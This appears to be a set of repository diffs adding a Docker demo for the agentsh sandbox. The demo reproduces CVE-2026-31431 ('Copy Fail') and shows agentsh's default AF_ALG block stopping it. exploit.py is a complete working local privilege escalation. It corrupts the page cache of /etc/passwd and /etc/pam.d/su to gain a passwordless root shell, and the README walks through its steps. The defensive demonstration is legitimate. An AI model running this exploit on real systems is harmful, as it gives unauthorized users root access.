+      ls /tmp/OWNED-BY-ALICE → No such file
+
+[4/4] Precision confirmed
+      agentsh wrap -- python3 /opt/exploit/detect.py
+      → BLOCKED (EAFNOSUPPORT)
+      note: "Default blocked families. No config change required."
+
+VERDICT: BLOCKED — AF_ALG socket denied before any page-cache write.
+         /etc/passwd and /etc/pam.d/su are unmodified.
+```
+
+## Config walkthrough narration
+
+```
+Zero configuration required.
+
+--- pause ---
+
+agentsh's DefaultBlockedFamilies() includes AF_ALG (family 38)
+alongside AF_VSOCK, AF_RDS, AF_TIPC, and other kernel facilities
+that are almost never needed by AI agent workloads.
+
+--- pause ---
+
+Copy Fail was publicly disclosed on 2026-04-29.
+AF_ALG was added to the default block list years earlier,
+as general kernel attack-surface reduction.
+Any system running agentsh with default settings was already
+protected — before the CVE existed.
+
+--- pause ---
+
+When socket(AF_ALG, SOCK_SEQPACKET, 0) returns EAFNOSUPPORT,
+the exploit stops. The write4() function never runs.
+/etc/passwd and /etc/pam.d/su are never touched.
+The page cache stays clean.
+```
+
+## Success criteria
+
+Asserted by `verify.sh`:
+
+| Check | Vuln mode | Protected mode |
+|---|---|---|
+| `detect.py` exit code | 0 (OPEN) | 1 (BLOCKED) |
+| `/tmp/OWNED-BY-ALICE` exists | yes (exit 0) or absent (exit 2 = kernel patched) | **no** |
+| `/etc/passwd` alice uid after exploit attempt | `0000` (or `1000` if patched) | `1000` (unchanged) |
+| `exploit.py` exit code | 0 or 2 (patched) | 1 (EAFNOSUPPORT) |
+
+## demo.html
+
+Same visual style as the two previous demos. The policy section at the top is replaced with a **"Zero configuration required"** callout:
+
+- Displays the agentsh config YAML (minimal — just `seccomp.enabled: true`)
+- Explains `DefaultBlockedFamilies()` and that AF_ALG has been in it since the feature shipped
+- Notes the disclosure date and the pre-disclosure protection
+- Then shows both recordings
+
+## Open items (resolved by RECON task 0)
+
+- Confirm agentsh binary (`bin/agentsh` and `bin/agentsh-unixwrap`) are current builds with socket-family blocking working (validated for DirtyFrag; should carry over).
+- Confirm `su` + PAM packages available in `debian:trixie-slim` (or identify the correct package name).
+- Confirm the exploit's page-cache write actually lands on the host kernel in use (`6.19.13-arch1-1` per session context; may already be patched — handle gracefully per spec above).
+- Confirm `file_monitor.enabled: false` is the correct workaround for issue #304 in this config (same as DirtyFrag demo, already validated).

--- a/examples/demo-cve-2026-31431/.gitignore
+++ b/examples/demo-cve-2026-31431/.gitignore
@@ -1,0 +1,1 @@
+recordings/*.tmp.cast

--- a/examples/demo-cve-2026-31431/.gitignore
+++ b/examples/demo-cve-2026-31431/.gitignore
@@ -1,1 +1,3 @@
 recordings/*.tmp.cast
+__pycache__/
+*.pyc

--- a/examples/demo-cve-2026-31431/Dockerfile
+++ b/examples/demo-cve-2026-31431/Dockerfile
@@ -1,0 +1,44 @@
+# examples/demo-cve-2026-31431/Dockerfile
+FROM debian:trixie-slim
+
+# python3: os.splice requires 3.10+ (trixie ships 3.13).
+# login: provides /usr/bin/su (setuid root) and /etc/pam.d/su.
+# libpam-runtime: PAM framework + /etc/pam.d/ infrastructure.
+# bat, asciinema, ca-certificates: demo narration and health checks.
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    python3 \
+    login \
+    libpam-runtime \
+    bat asciinema ca-certificates \
+ && rm -rf /var/lib/apt/lists/* \
+ && ln -sf /usr/bin/batcat /usr/local/bin/bat
+
+# Verify su is setuid root and pam.d/su has pam_rootok.so (required by exploit).
+RUN test -u /usr/bin/su || (echo "su is NOT setuid — abort" && exit 1)
+RUN grep -q pam_rootok /etc/pam.d/su || (echo "/etc/pam.d/su missing pam_rootok — abort" && exit 1)
+
+COPY bin/agentsh          /usr/local/bin/agentsh
+COPY bin/agentsh-unixwrap /usr/local/bin/agentsh-unixwrap
+RUN chmod 0755 /usr/local/bin/agentsh /usr/local/bin/agentsh-unixwrap
+
+RUN useradd -m -u 1000 -s /bin/bash alice
+
+RUN mkdir -p /etc/agentsh/policies /var/lib/agentsh/sessions
+COPY examples/demo-cve-2026-31431/config.yml       /etc/agentsh/config.yml
+COPY examples/demo-cve-2026-31431/agent-default.yml /etc/agentsh/policies/agent-default.yml
+RUN chown -R root:alice /etc/agentsh/policies \
+ && chmod 0775 /etc/agentsh/policies
+
+COPY examples/demo-cve-2026-31431/exploit  /opt/exploit
+COPY examples/demo-cve-2026-31431/scripts  /opt/scripts
+RUN chmod +x /opt/exploit/*.py /opt/scripts/*.sh /opt/scripts/lib/*.sh 2>/dev/null || true
+
+RUN install -d -o alice -g alice /home/alice/work \
+ && chown -R alice:alice /var/lib/agentsh
+
+USER alice
+WORKDIR /home/alice/work
+ENV PS1='alice@demo:\w$ ' TERM=xterm-256color TARGET_USER=alice
+
+ENTRYPOINT ["/opt/scripts/dispatch.sh"]
+CMD ["help"]

--- a/examples/demo-cve-2026-31431/Makefile
+++ b/examples/demo-cve-2026-31431/Makefile
@@ -1,0 +1,41 @@
+# examples/demo-cve-2026-31431/Makefile
+IMAGE        := agentsh-copyfail-demo
+DOCKERFILE   := examples/demo-cve-2026-31431/Dockerfile
+CTX          := ../..
+RECORD_FLAGS := --idle-time-limit=1 --cols=100 --rows=30
+
+AGENTSH_DOCKER_FLAGS := \
+  --cap-add=SYS_ADMIN \
+  --cap-add=SYS_PTRACE \
+  --device=/dev/fuse \
+  --security-opt=apparmor=unconfined
+
+.PHONY: build demo-vuln demo-agentsh record verify clean help
+
+help:
+	@echo "Targets: build demo-vuln demo-agentsh record verify clean"
+
+build:
+	cd $(CTX) && docker build -f $(DOCKERFILE) -t $(IMAGE) .
+
+demo-vuln: build
+	docker run --rm -it --security-opt seccomp=unconfined $(IMAGE) vuln
+
+demo-agentsh: build
+	docker run --rm -it $(AGENTSH_DOCKER_FLAGS) $(IMAGE) agentsh
+
+verify: build
+	docker run --rm --security-opt seccomp=unconfined $(IMAGE) verify vuln
+	docker run --rm $(AGENTSH_DOCKER_FLAGS) $(IMAGE) verify agentsh
+
+record: build
+	@command -v asciinema >/dev/null || (echo "Install asciinema first"; exit 1)
+	asciinema rec $(RECORD_FLAGS) \
+	  -c 'docker run --rm -it --security-opt seccomp=unconfined $(IMAGE) vuln' \
+	  recordings/vuln.cast --overwrite
+	asciinema rec $(RECORD_FLAGS) \
+	  -c 'docker run --rm -it $(AGENTSH_DOCKER_FLAGS) $(IMAGE) agentsh' \
+	  recordings/agentsh.cast --overwrite
+
+clean:
+	docker image rm $(IMAGE) 2>/dev/null || true

--- a/examples/demo-cve-2026-31431/README.md
+++ b/examples/demo-cve-2026-31431/README.md
@@ -1,0 +1,64 @@
+# CVE-2026-31431 (Copy Fail) Demo
+
+A self-contained Docker demo that:
+
+1. Reproduces **CVE-2026-31431** — a logic flaw in `algif_aead`/`authencesn`
+   that gives any unprivileged user a deterministic, race-free 4-byte
+   page-cache write primitive. Chained through `/etc/passwd` and
+   `/etc/pam.d/su`, it produces a no-password root shell.
+2. Shows agentsh's **default configuration** blocking the exploit
+   before the first byte is written — zero custom rules required.
+
+Watch the recordings:
+
+```sh
+asciinema play recordings/vuln.cast
+asciinema play recordings/agentsh.cast
+# or open recordings/demo.html in a browser
+```
+
+## Run it yourself
+
+```sh
+make build
+make demo-vuln     # page-cache write lands, root marker written
+make demo-agentsh  # AF_ALG blocked at socket(), /etc/passwd untouched
+make verify        # non-interactive assertions
+```
+
+## The protection: zero config
+
+agentsh's `DefaultBlockedFamilies()` includes `AF_ALG` (family 38). No
+`socket_rules`, no `blocked_socket_families` entry is needed in config:
+
+```yaml
+sandbox:
+  seccomp:
+    enabled: true
+    # AF_ALG blocked by default. Nothing else to configure.
+```
+
+The Copy Fail exploit must call `socket(AF_ALG, SOCK_SEQPACKET, 0)` as its
+very first step. agentsh returns `EAFNOSUPPORT` before `write4()` is ever
+invoked, leaving `/etc/passwd` and `/etc/pam.d/su` untouched.
+
+**agentsh blocked Copy Fail before the CVE was publicly disclosed.**
+
+## How the exploit works
+
+1. Opens `/etc/passwd` and `/etc/pam.d/su` read-only.
+2. For each 4-byte patch: creates an `AF_ALG` (authencesn) socket, splices
+   the file page into the AEAD scatterlist as a writable destination,
+   which corrupts the page cache in place.
+3. Patches `/etc/passwd`: alice's UID field `1000` → `0000`.
+4. Patches `/etc/pam.d/su`: `pam_rootok.so` → `pam_permit.so`.
+5. Runs `su alice` — PAM immediately grants auth, alice appears as uid=0.
+
+Nothing is written to disk. Rebooting or dropping page cache reverts the patches.
+
+## CVE references
+
+- **CVE-2026-31431** — copy.fail / algif_aead/authencesn page-cache LPE
+- Affected: Linux kernels ~4.14 through pre-patch (mainline commit a664bf3d603d)
+- Advisory: https://copy.fail/ · https://xint.io/blog/copy-fail-linux-distributions
+- PoC basis: https://github.com/mfloresdacunha/CVE-2026-31431

--- a/examples/demo-cve-2026-31431/agent-default.yml
+++ b/examples/demo-cve-2026-31431/agent-default.yml
@@ -1,0 +1,3 @@
+version: 1
+name: agent-default
+description: Minimal default policy for the Copy Fail demo.

--- a/examples/demo-cve-2026-31431/config.yml
+++ b/examples/demo-cve-2026-31431/config.yml
@@ -1,0 +1,54 @@
+# examples/demo-cve-2026-31431/config.yml
+# AF_ALG (family 38) is in DefaultBlockedFamilies() — no custom rule needed.
+# agentsh blocked Copy Fail before the CVE was disclosed.
+
+server:
+  http:
+    addr: "127.0.0.1:18080"
+  grpc:
+    enabled: false
+  unix_socket:
+    enabled: false
+
+auth:
+  type: "none"
+
+metrics:
+  enabled: false
+
+health:
+  path: "/health"
+  readiness_path: "/ready"
+
+policies:
+  dir: /etc/agentsh/policies
+  default: agent-default
+
+sessions:
+  base_dir: /var/lib/agentsh/sessions
+  max_sessions: 10
+
+audit:
+  enabled: true
+  output: /var/lib/agentsh/audit.jsonl
+  storage:
+    sqlite_path: /var/lib/agentsh/events.db
+
+sandbox:
+  allow_degraded: true
+  fuse:
+    enabled: false
+  network:
+    enabled: false
+  unix_sockets:
+    enabled: false
+  seccomp:
+    enabled: true
+    mode: enforce
+    syscalls:
+      default_action: allow
+    file_monitor:
+      enabled: false  # explicit: prevents auto-enable deadlock (issue #304)
+    # blocked_socket_families is NOT set here.
+    # DefaultBlockedFamilies() applies automatically and includes AF_ALG.
+    # No custom rules required to block CVE-2026-31431.

--- a/examples/demo-cve-2026-31431/exploit/detect.py
+++ b/examples/demo-cve-2026-31431/exploit/detect.py
@@ -1,0 +1,18 @@
+#!/usr/bin/env python3
+# exploit/detect.py — check whether the AF_ALG attack surface is accessible.
+# Returns 0 if OPEN (vulnerable), 1 if BLOCKED.
+import errno, socket, sys
+
+AF_ALG = 38
+
+try:
+    fd = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    fd.close()
+    print("socket(AF_ALG, SOCK_SEQPACKET, 0)   OPEN   — Copy Fail attack surface accessible")
+    sys.exit(0)
+except OSError as e:
+    if e.errno == errno.EAFNOSUPPORT:
+        print("socket(AF_ALG, SOCK_SEQPACKET, 0)   BLOCKED (EAFNOSUPPORT)")
+    else:
+        print(f"socket(AF_ALG, SOCK_SEQPACKET, 0)   ERROR  ({e})")
+    sys.exit(1)

--- a/examples/demo-cve-2026-31431/exploit/exploit.py
+++ b/examples/demo-cve-2026-31431/exploit/exploit.py
@@ -1,0 +1,169 @@
+#!/usr/bin/env python3
+# exploit/exploit.py
+# CVE-2026-31431 ("Copy Fail") — LPE via algif_aead/authencesn page-cache write.
+# Two patches applied to page cache (NOT disk):
+#   1. /etc/passwd   — flip alice's UID field to "0000"
+#   2. /etc/pam.d/su — replace pam_rootok.so with pam_permit.so
+# Drop page cache (echo 3 > /proc/sys/vm/drop_caches) to revert.
+# AUTHORIZED TESTING ONLY.
+# Exit codes: 0 = exploit succeeded, 1 = error, 2 = kernel patched (write did not land).
+
+import errno, os, pwd, shlex, socket, struct, sys
+
+AF_ALG   = 38
+SOL_ALG  = 279
+ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
+PASSWD   = "/etc/passwd"
+PAM_SU   = "/etc/pam.d/su"
+
+
+def authenc_keyblob(authkey: bytes, enckey: bytes) -> bytes:
+    rtattr   = struct.pack("HH", 8, 1)
+    keyparam = struct.pack(">I", len(enckey))
+    return rtattr + keyparam + authkey + enckey
+
+
+def write4(target_path: str, file_offset: int, four_bytes: bytes) -> None:
+    if len(four_bytes) != 4:
+        raise ValueError("write4 requires exactly 4 bytes")
+
+    fd = os.open(target_path, os.O_RDONLY)
+    try:
+        # Fault in the specific page containing file_offset (files larger than
+        # 4 KB may have the target offset beyond the first page).
+        page_start = (file_offset // 4096) * 4096
+        os.lseek(fd, page_start, os.SEEK_SET)
+        os.read(fd, 4096)
+        os.lseek(fd, 0, os.SEEK_SET)
+
+        master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+        master.bind(("aead", ALG_NAME))
+        master.setsockopt(SOL_ALG, 1,
+                          authenc_keyblob(b"\x00" * 32, b"\x00" * 16))
+        op, _ = master.accept()
+        try:
+            aad  = b"\x00" * 4 + four_bytes
+            cmsg = [
+                (SOL_ALG, 3, struct.pack("I", 0)),
+                (SOL_ALG, 2, struct.pack("I", 16) + b"\x00" * 16),
+                (SOL_ALG, 4, struct.pack("I", 8)),
+            ]
+            op.sendmsg([aad], cmsg, socket.MSG_MORE)
+
+            pr, pw = os.pipe()
+            try:
+                n = os.splice(fd, pw, 32, offset_src=file_offset)
+                if n != 32:
+                    raise RuntimeError(f"splice file->pipe short: {n}")
+                n = os.splice(pr, op.fileno(), n)
+                if n != 32:
+                    raise RuntimeError(f"splice pipe->op short: {n}")
+            finally:
+                os.close(pr)
+                os.close(pw)
+            try:
+                op.recv(8 + 32)
+            except OSError:
+                pass  # EBADMSG expected — ciphertext is junk; we only needed the page-cache write
+        finally:
+            op.close()
+            master.close()
+    finally:
+        os.close(fd)
+
+
+def find_uid_field(path: str, username: str) -> tuple[int, str]:
+    with open(path, "rb") as f:
+        data = f.read()
+    prefix = (username + ":x:").encode()
+    pos = data.find(prefix)
+    if pos < 0:
+        raise LookupError(f"{username} not found in {path}")
+    uid_start = pos + len(prefix)
+    uid_end   = data.index(b":", uid_start)
+    return uid_start, data[uid_start:uid_end].decode()
+
+
+def patch_passwd(user: str) -> None:
+    uid_off, uid_str = find_uid_field(PASSWD, user)
+    if len(uid_str) != 4:
+        raise RuntimeError(
+            f"UID field {uid_str!r} is not 4 digits — exploit requires a 4-digit UID (e.g. 1000)"
+        )
+    print(f"[*] {PASSWD}: {user} UID field at offset {uid_off} = {uid_str!r}")
+    print(f"[*] Patching UID {uid_str} -> 0000 in page cache ...")
+    write4(PASSWD, uid_off, b"0000")
+
+    with open(PASSWD, "rb") as f:
+        f.seek(uid_off)
+        landed = f.read(4)
+    print(f"[*] Page cache now reads {landed!r} at offset {uid_off}")
+    if landed != b"0000":
+        raise RuntimeError(
+            "passwd patch did not land — kernel may be patched (commit a664bf3d603d)."
+        )
+    pwent = pwd.getpwnam(user)
+    print(f"[*] getpwnam({user!r}).pw_uid = {pwent.pw_uid}")
+    print(f"[+] /etc/passwd: {user} now appears as UID 0 in page cache")
+
+
+def patch_pam_su() -> None:
+    with open(PAM_SU, "rb") as f:
+        data = f.read()
+    off = data.find(b"pam_rootok.so")
+    if off < 0:
+        raise RuntimeError("pam_rootok.so not found in /etc/pam.d/su")
+    print(f"[*] {PAM_SU}: pam_rootok.so at offset {off}")
+    print(f"[*] Patching pam_rootok.so -> pam_permit.so in page cache ...")
+    write4(PAM_SU, off + 4, b"perm")  # "root" → "perm"
+    write4(PAM_SU, off + 8, b"it.s")  # "ok.s" → "it.s"  result: pam_permit.so
+
+    with open(PAM_SU, "rb") as f:
+        f.seek(off)
+        landed = f.read(13)
+    print(f"[*] Page cache now reads {landed!r}")
+    if landed != b"pam_permit.so":
+        raise RuntimeError("PAM patch did not land.")
+    print(f"[+] {PAM_SU}: auth sufficient pam_permit.so active — no password needed")
+
+
+def main() -> int:
+    user = os.environ.get("TARGET_USER") or pwd.getpwuid(os.getuid()).pw_name
+    print(f"[*] CVE-2026-31431 (Copy Fail)  user={user}  uid={os.getuid()}")
+
+    try:
+        patch_passwd(user)
+        patch_pam_su()
+    except LookupError as e:
+        print(f"[!] {e}")
+        return 1
+    except RuntimeError as e:
+        msg = str(e)
+        print(f"[!] {msg}")
+        if "kernel may be patched" in msg or "did not land" in msg:
+            print("[i] Host kernel appears to have commit a664bf3d603d applied.")
+            print("[i] AF_ALG socket still opened — agentsh blocks it regardless.")
+            return 2  # distinct exit code: kernel patched, not an exploit bug
+        return 1
+
+    print()
+    print(f"[+] Both patches landed. Running: su {user} -c 'id > /tmp/OWNED-BY-ALICE'")
+    print()
+    sys.stdout.flush()
+
+    rc = os.system(f"su {shlex.quote(user)} -c 'id > /tmp/OWNED-BY-ALICE'")
+    if rc == 0 and os.path.exists("/tmp/OWNED-BY-ALICE"):
+        with open("/tmp/OWNED-BY-ALICE") as f:
+            content = f.read().strip()
+        print(f"[+] /tmp/OWNED-BY-ALICE written: {content}")
+        print(f"[+] File owner: ", end="")
+        sys.stdout.flush()
+        os.system("ls -la /tmp/OWNED-BY-ALICE")
+    else:
+        print("[!] su did not write marker — su may have failed or kernel patched.")
+        return 1
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/examples/demo-cve-2026-31431/recordings/README.md
+++ b/examples/demo-cve-2026-31431/recordings/README.md
@@ -1,0 +1,22 @@
+# Recordings
+
+| File | Mode | What you'll see |
+|---|---|---|
+| `vuln.cast` | no agentsh, Docker seccomp off | KERNEL PATCHED or /etc/passwd uid=0000, marker written as root |
+| `agentsh.cast` | agentsh default config | EAFNOSUPPORT at socket() — zero config blocks it |
+
+## Playback
+
+```sh
+asciinema play vuln.cast
+asciinema play agentsh.cast
+# or open demo.html in a browser (self-contained, no server needed)
+```
+
+## Re-record
+
+```sh
+cd examples/demo-cve-2026-31431
+make record
+python3 scripts/gen_demo_html.py
+```

--- a/examples/demo-cve-2026-31431/recordings/README.md
+++ b/examples/demo-cve-2026-31431/recordings/README.md
@@ -15,8 +15,9 @@ asciinema play agentsh.cast
 
 ## Re-record
 
+From the **repo root**:
+
 ```sh
-cd examples/demo-cve-2026-31431
-make record
-python3 scripts/gen_demo_html.py
+make -C examples/demo-cve-2026-31431 record
+python3 examples/demo-cve-2026-31431/scripts/gen_demo_html.py
 ```

--- a/examples/demo-cve-2026-31431/scripts/demo-agentsh.sh
+++ b/examples/demo-cve-2026-31431/scripts/demo-agentsh.sh
@@ -1,0 +1,43 @@
+#!/bin/bash
+# scripts/demo-agentsh.sh — same exploit, wrapped by agentsh defaults.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+CONFIG=/etc/agentsh/config.yml
+
+banner "CVE-2026-31431 (Copy Fail) — same exploit, under agentsh"
+note "AF_ALG is in DefaultBlockedFamilies(). Zero custom configuration."
+note "agentsh blocked this before the CVE was disclosed."
+pause
+
+step "0/4" "Show the agentsh config — no custom rules"
+show_yaml "$CONFIG"
+pause
+print_walkthrough /opt/scripts/lib/config-walkthrough.txt
+
+step "1/4" "Identity check (same alice, same image)"
+agentsh wrap -- whoami
+agentsh wrap -- id
+
+step "2/4" "AF_ALG attack surface check under agentsh"
+note "Expected: BLOCKED (EAFNOSUPPORT) — DefaultBlockedFamilies() catches AF_ALG"
+agentsh wrap -- python3 /opt/exploit/detect.py || true
+
+step "3/4" "Attempt the full exploit under agentsh"
+note "Expected: Traceback at socket(AF_ALG, ...) — write4() never runs"
+agentsh wrap -- python3 /opt/exploit/exploit.py || true
+
+step "4/4" "Verify nothing was modified"
+note "/etc/passwd alice uid:"
+grep "^alice:" /etc/passwd || true
+note "Marker file:"
+ls "$MARKER" 2>&1 || note "  (expected: no such file)"
+
+if [ ! -f "$MARKER" ] && ! grep -q "^alice:x:0000:" /etc/passwd 2>/dev/null; then
+    verdict_blocked "AF_ALG blocked before first write. /etc/passwd and PAM untouched."
+    exit 0
+else
+    printf '\n%sEXPECTED BLOCKED but exploit may have landed.%s\n' "$C_FAIL" "$C_OFF"
+    exit 1
+fi

--- a/examples/demo-cve-2026-31431/scripts/demo-vuln.sh
+++ b/examples/demo-cve-2026-31431/scripts/demo-vuln.sh
@@ -1,0 +1,51 @@
+#!/bin/bash
+# scripts/demo-vuln.sh — CVE-2026-31431 reproduction without agentsh.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+
+banner "CVE-2026-31431 (Copy Fail) — bare exploit (no agentsh)"
+note "AF_ALG socket + splice() feeds a file's page cache into the kernel"
+note "crypto engine as a writable AEAD scatterlist. 4 bytes at a time,"
+note "we rewrite /etc/passwd (alice uid 1000→0000) and /etc/pam.d/su"
+note "(pam_rootok.so → pam_permit.so). Nothing touches disk."
+pause
+
+step "0/5" "(no agentsh — bare Linux, Docker seccomp disabled)"
+note "agentsh is installed but not wrapping this shell."
+
+step "1/5" "Identity check — alice is unprivileged"
+whoami; id
+
+step "2/5" "AF_ALG attack surface check"
+note "socket(AF_ALG, SOCK_SEQPACKET, 0):"
+python3 /opt/exploit/detect.py || true
+
+step "3/5" "/etc/passwd — pre-exploit state"
+grep "^alice:" /etc/passwd || true
+note "(uid field will change in page cache without touching disk)"
+
+step "4/5" "Run Copy Fail exploit"
+python3 /opt/exploit/exploit.py
+EXPLOIT_RC=$?
+
+step "5/5" "Check results"
+if [ $EXPLOIT_RC -eq 0 ] && [ -f "$MARKER" ]; then
+    echo "--- /etc/passwd (page cache): ---"
+    grep "^alice:" /etc/passwd || true
+    echo "--- /tmp/OWNED-BY-ALICE: ---"
+    cat "$MARKER"
+    echo "--- ownership: ---"
+    ls -la "$MARKER"
+    verdict_success "alice obtained root via page-cache corruption."
+    exit 0
+elif [ $EXPLOIT_RC -eq 2 ]; then
+    note "Kernel patched (commit a664bf3d603d). Write did not land."
+    note "AF_ALG socket still opened — agentsh would have blocked this."
+    verdict_patched "kernel patched; socket still open, agentsh still blocks it."
+    exit 0
+else
+    printf '\n%sEXPECTED EXPLOIT TO SUCCEED but exploit.py returned %d.%s\n' "$C_FAIL" "$EXPLOIT_RC" "$C_OFF"
+    exit 1
+fi

--- a/examples/demo-cve-2026-31431/scripts/demo-vuln.sh
+++ b/examples/demo-cve-2026-31431/scripts/demo-vuln.sh
@@ -27,8 +27,8 @@ grep "^alice:" /etc/passwd || true
 note "(uid field will change in page cache without touching disk)"
 
 step "4/5" "Run Copy Fail exploit"
-python3 /opt/exploit/exploit.py
-EXPLOIT_RC=$?
+python3 /opt/exploit/exploit.py || EXPLOIT_RC=$?
+EXPLOIT_RC=${EXPLOIT_RC:-0}
 
 step "5/5" "Check results"
 if [ $EXPLOIT_RC -eq 0 ] && [ -f "$MARKER" ]; then

--- a/examples/demo-cve-2026-31431/scripts/dispatch.sh
+++ b/examples/demo-cve-2026-31431/scripts/dispatch.sh
@@ -6,7 +6,7 @@ start_server() {
     agentsh server --config /etc/agentsh/config.yml >/tmp/agentsh-server.log 2>&1 &
     local pid=$!
     for _ in $(seq 1 50); do
-        if curl -fsS http://127.0.0.1:18080/health >/dev/null 2>&1; then
+        if python3 -c "import urllib.request; urllib.request.urlopen('http://127.0.0.1:18080/health')" >/dev/null 2>&1; then
             return 0
         fi
         if ! kill -0 "$pid" 2>/dev/null; then

--- a/examples/demo-cve-2026-31431/scripts/dispatch.sh
+++ b/examples/demo-cve-2026-31431/scripts/dispatch.sh
@@ -1,0 +1,47 @@
+#!/bin/bash
+# scripts/dispatch.sh
+set -eu
+
+start_server() {
+    agentsh server --config /etc/agentsh/config.yml >/tmp/agentsh-server.log 2>&1 &
+    local pid=$!
+    for _ in $(seq 1 50); do
+        if curl -fsS http://127.0.0.1:18080/health >/dev/null 2>&1; then
+            return 0
+        fi
+        if ! kill -0 "$pid" 2>/dev/null; then
+            echo "agentsh server exited prematurely. Log:" >&2
+            cat /tmp/agentsh-server.log >&2
+            return 1
+        fi
+        sleep 0.2
+    done
+    echo "agentsh server did not become ready within 10s. Log:" >&2
+    cat /tmp/agentsh-server.log >&2
+    return 1
+}
+
+case "${1:-help}" in
+  vuln)    exec /opt/scripts/demo-vuln.sh ;;
+  agentsh) start_server && exec /opt/scripts/demo-agentsh.sh ;;
+  verify)  start_server && exec /opt/scripts/verify.sh "${2:-both}" ;;
+  shell)   exec bash -l ;;
+  help|*)
+    cat <<EOF
+Usage: docker run [flags] agentsh-copyfail-demo <mode>
+
+Modes:
+  vuln     Reproduce CVE-2026-31431; root marker written.
+  agentsh  Same exploit under agentsh; blocked before first write.
+  verify   Non-interactive assertion run.
+  shell    Interactive shell as alice.
+
+Docker flags for vuln mode:
+  --security-opt seccomp=unconfined
+
+Docker flags for agentsh mode:
+  --cap-add=SYS_ADMIN --cap-add=SYS_PTRACE
+  --device=/dev/fuse --security-opt=apparmor=unconfined
+EOF
+    exit 1 ;;
+esac

--- a/examples/demo-cve-2026-31431/scripts/gen_demo_html.py
+++ b/examples/demo-cve-2026-31431/scripts/gen_demo_html.py
@@ -1,0 +1,201 @@
+#!/usr/bin/env python3
+"""Generate a self-contained demo.html embedding both cast files."""
+import pathlib
+
+ROOT  = pathlib.Path("examples/demo-cve-2026-31431")
+RECS  = ROOT / "recordings"
+OUT   = RECS / "demo.html"
+
+def escape_cast(path):
+    return path.read_bytes().replace(b"\x1b", b"\\u001b").decode()
+
+vuln_cast    = escape_cast(RECS / "vuln.cast")
+agentsh_cast = escape_cast(RECS / "agentsh.cast")
+
+html = f"""<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>CVE-2026-31431 (Copy Fail) &mdash; Before &amp; After agentsh</title>
+<meta name="description" content="Copy Fail LPE via page-cache write — blocked by agentsh default configuration.">
+<link rel="icon" type="image/svg+xml" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230E4A33'/%3E%3Cpolyline points='8 20 14 14 8 8' fill='none' stroke='%23ffffff' stroke-width='2.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3Cline x1='16' y1='22' x2='24' y2='22' stroke='%23ffffff' stroke-width='2.5' stroke-linecap='round'/%3E%3C/svg%3E">
+<link rel="preconnect" href="https://fonts.googleapis.com">
+<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+<link href="https://fonts.googleapis.com/css2?family=DM+Serif+Display&family=Inter:wght@400;500;600&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/asciinema-player@3.15.1/dist/bundle/asciinema-player.css">
+<style>
+  *,*::before,*::after{{box-sizing:border-box;margin:0;padding:0}}
+  :root{{--bg:#F4F8F6;--bg2:#fff;--border:#e2e8e5;--border2:#d0d8d5;--txt:#06100C;--txt2:#0A2A1F;--muted:#4A362A;--faint:#8a8a8a;--green:#0E4A33;--green2:#4FA36A;--red:#C86A3E;--r:18px;--rs:12px}}
+  html{{scroll-behavior:smooth}}
+  body{{font-family:ui-sans-serif,system-ui,-apple-system,Segoe UI,Roboto,sans-serif;background:var(--bg);color:var(--muted);line-height:1.6;overflow-x:hidden}}
+  a{{color:inherit;text-decoration:none}}
+  code{{font-family:'JetBrains Mono',monospace;font-size:.9em}}
+  .bg-grad{{position:fixed;inset:0;pointer-events:none;background:radial-gradient(ellipse at 50% 0%,rgba(197,214,174,.4) 0%,transparent 60%);z-index:-1}}
+  nav{{position:sticky;top:0;z-index:50;background:rgba(244,248,246,.92);backdrop-filter:blur(12px);border-bottom:1px solid var(--border)}}
+  .nav-inner{{max-width:1024px;margin:0 auto;padding:14px 24px;display:flex;align-items:center;justify-content:space-between}}
+  .nav-left{{display:flex;align-items:center;gap:24px}}
+  .nav-logo{{display:flex;align-items:center;gap:10px;transition:opacity .3s}}
+  .nav-logo:hover{{opacity:.85}}
+  .nav-logo-icon{{width:28px;height:28px;border-radius:var(--rs);background:var(--green);display:flex;align-items:center;justify-content:center}}
+  .nav-logo-icon svg{{color:#fff}}
+  .nav-logo-text{{font-weight:500;color:var(--txt);letter-spacing:-.01em}}
+  .nav-sep{{width:1px;height:20px;background:var(--border2)}}
+  .nav-cr-text{{font-size:13px;font-weight:500;color:var(--muted);transition:color .2s}}
+  .nav-cr-link:hover .nav-cr-text{{color:var(--green)}}
+  .nav-links{{display:flex;align-items:center;gap:20px;font-size:13px}}
+  .nav-links a{{color:var(--muted);transition:color .2s}}
+  .nav-links a:hover{{color:var(--green)}}
+  .badge-cve{{display:inline-flex;align-items:center;gap:5px;padding:3px 10px;border-radius:999px;background:rgba(200,106,62,.1);border:1px solid rgba(200,106,62,.25);color:var(--red);font-family:'JetBrains Mono',monospace;font-size:11px;font-weight:600;letter-spacing:.02em}}
+  .hero{{max-width:1024px;margin:0 auto;padding:80px 24px 40px;text-align:center}}
+  .hero-title{{font-family:'DM Serif Display',serif;font-size:clamp(28px,5vw,44px);font-weight:400;color:var(--txt);letter-spacing:-.01em;line-height:1.15;margin-bottom:16px}}
+  .hero-title .accent{{color:var(--green)}}
+  .hero-subtitle{{font-size:clamp(14px,2vw,17px);color:var(--txt2);line-height:1.6;max-width:600px;margin:0 auto 12px}}
+  .hero-links{{display:flex;justify-content:center;gap:16px;flex-wrap:wrap;margin-top:16px}}
+  .hero-links a{{font-size:13px;color:var(--green);border-bottom:1px solid rgba(14,74,51,.25);padding-bottom:1px;transition:border-color .2s}}
+  .hero-links a:hover{{border-color:var(--green)}}
+  .zero-config{{max-width:1024px;margin:0 auto;padding:0 24px 48px}}
+  .zc-header{{display:flex;align-items:center;gap:12px;margin-bottom:20px}}
